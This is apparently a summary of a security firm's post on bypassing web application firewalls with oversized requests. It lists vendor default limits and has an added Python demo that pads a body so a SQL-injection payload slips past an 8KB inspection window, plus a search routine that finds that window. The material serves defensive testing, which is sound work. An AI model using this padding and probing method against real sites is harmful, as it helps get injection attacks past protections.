Source: Black Hills Information Security, Inc.
Author: BHIS
URL: https://www.blackhillsinfosec.com/bypassing-wafs-using-oversized-requests/
Bypassing WAFs Using Oversized Requests
ONE SENTENCE SUMMARY:
Many WAFs inspect only the first few kilobytes of a request, so a payload placed past that limit is never examined; whether this works against a given product depends on its default and configured oversize handling, which must be reviewed and tested rather than assumed.
MAIN POINTS:
- Many WAFs inspect only a bounded prefix of each request body; a payload placed beyond that limit is never inspected and reaches the application.
- Configuration determines exploitability: some products allow the bypass by default because their design prioritizes flexibility and performance over strict inspection.
- The post tests Cloudflare, Barracuda, ModSecurity, AWS WAF, Azure (Application Gateway and Front Door), Google Cloud Armor, Sucuri, and Fortinet.
- Cloudflare's free tier inspects only the first 8KB of a request, so larger requests bypass it; higher tiers have larger limits.
- Barracuda's WAF is secure by default: no size-based bypass was found unless an administrator explicitly loosens the configuration.
- ModSecurity's default configuration runs in detection-only mode, so it must be switched to blocking mode and its request-body size handling reviewed before it blocks anything.
- AWS WAF inspects only the first 8KB of the request body by default for certain services; the limit can be raised, and what happens to the uninspected remainder depends on the rule's oversize handling.
- Azure Application Gateway's WAF fails closed on oversized requests, while Azure Front Door's WAF defaults to letting them through.
- Google Cloud Armor and Sucuri are vulnerable by default: their inspection limits let large requests through with the remainder uninspected.
- Balancing WAF performance, usability, and security is unavoidable; the limits and rules must be tuned to the application's real traffic rather than left at vendor defaults.
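The mechanics behind the points above, as an added example that is not code from the BHIS post and models no specific vendor: a toy WAF that inspects only the first 8KB of a body under three oversize-handling behaviours, a builder that pads a form body so the payload lands past the cut-off, and a binary search that recovers the inspection limit from allow/block responses alone. The 8KB window, the crude SQLi signature and the parameter names `filler` and `q` are assumptions for the demo; "continue", "match" and "no_match" are the names AWS WAF uses for its oversize-handling options, borrowed here as labels for the three behaviours.

```python
"""Toy model of an 8 KB request-body inspection limit and the padding bypass.

Added example for this summary; not code from the BHIS post. The limit,
signature, parameter names and payload are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import quote, unquote_to_bytes

INSPECT_LIMIT = 8 * 1024  # assumed inspection window (the post cites 8 KB for several defaults)

# Crude stand-in for a managed SQLi rule; demo only, not a real rule set.
SIGNATURE = re.compile(rb"(?i)'\s*or\s+1\s*=\s*1")


@dataclass
class Verdict:
    allowed: bool
    reason: str


def waf_inspect(body: bytes, limit: int = INSPECT_LIMIT, oversize: str = "continue") -> Verdict:
    """Decide one request body.

    `oversize` models what the product does with a body longer than `limit`:
      continue  - run the rule on the first `limit` bytes and ignore the rest
                  (fails open when the payload sits past the cut-off)
      no_match  - skip the rule entirely for oversized bodies (fails open)
      match     - treat any oversized body as a rule hit and block (fails closed)
    """
    oversized = len(body) > limit
    if oversized and oversize == "match":
        return Verdict(False, "blocked: body exceeds inspection limit")
    if oversized and oversize == "no_match":
        return Verdict(True, "allowed: oversized body skipped inspection")
    # Real products URL-decode before matching; so do we, but only on the
    # window the WAF actually sees, which is what makes the padding work.
    window = unquote_to_bytes(body[:limit])
    if SIGNATURE.search(window):
        return Verdict(False, "blocked: signature matched")
    return Verdict(True, "allowed: nothing matched in inspected bytes")


def build_padded_body(payload: str, pad_bytes: int) -> bytes:
    """Form body where a junk parameter pushes `payload` past `pad_bytes`.

    `filler` and `q` are arbitrary names (assumption): against a real target
    the padding goes in a parameter the app ignores and the payload in the
    parameter under test.
    """
    return b"filler=" + b"A" * pad_bytes + b"&q=" + quote(payload, safe="").encode()


def find_inspection_limit(send: Callable[[bytes], bool], payload: str,
                          max_pad: int = 1 << 20) -> Optional[int]:
    """Binary-search the smallest padding at which `payload` stops being blocked.

    `send(body)` returns True when the request was allowed. Against a live
    target you would wrap an HTTP client here; the demo wraps waf_inspect.
    Returns 0 if the payload was never blocked and None if it is still
    blocked at `max_pad` (fail-closed handling, or no size limit in play).
    """
    if send(build_padded_body(payload, 0)):
        return 0
    if not send(build_padded_body(payload, max_pad)):
        return None
    lo, hi = 0, max_pad  # invariant: blocked at lo, allowed at hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if send(build_padded_body(payload, mid)):
            hi = mid
        else:
            lo = mid
    return hi


def demo(payload: str = "1' OR 1=1--") -> dict:
    """Run the three behaviours against an unpadded and a padded body."""
    results = {}
    for mode in ("continue", "no_match", "match"):
        small = waf_inspect(build_padded_body(payload, 0), oversize=mode)
        big = waf_inspect(build_padded_body(payload, INSPECT_LIMIT), oversize=mode)
        results[mode] = (small.allowed, big.allowed)  # (unpadded, padded)
    results["threshold"] = find_inspection_limit(
        lambda b: waf_inspect(b, oversize="continue").allowed, payload)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>10}: {value}")
```

The recovered threshold comes out a few bytes under 8192 because the signature must fit entirely inside the inspected window; that offset is exactly what a tester sees when probing a real product with growing padding, and it is why the check in a test plan should be "does the payload still get blocked when preceded by N bytes of junk" for N around each tier's documented limit, not just "is the rule enabled".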
TAKEAWAYS:
- Oversized requests exploit inspection limits, so each WAF must be configured deliberately for the application it fronts rather than left at defaults.
- Cloudflare, AWS WAF, and ModSecurity typically need manual adjustments to close the gap.
- Azure's Application Gateway is not exposed to this bypass because its WAF fails closed on requests over the limit.
- Observed request sizes from real application traffic should drive the limit and oversize settings, so that legitimate large requests still work without opening a bypass.
- Testing a WAF means checking both rule coverage and how it behaves at its resource limits; a rule that only fires on the first 8KB protects nothing placed after them.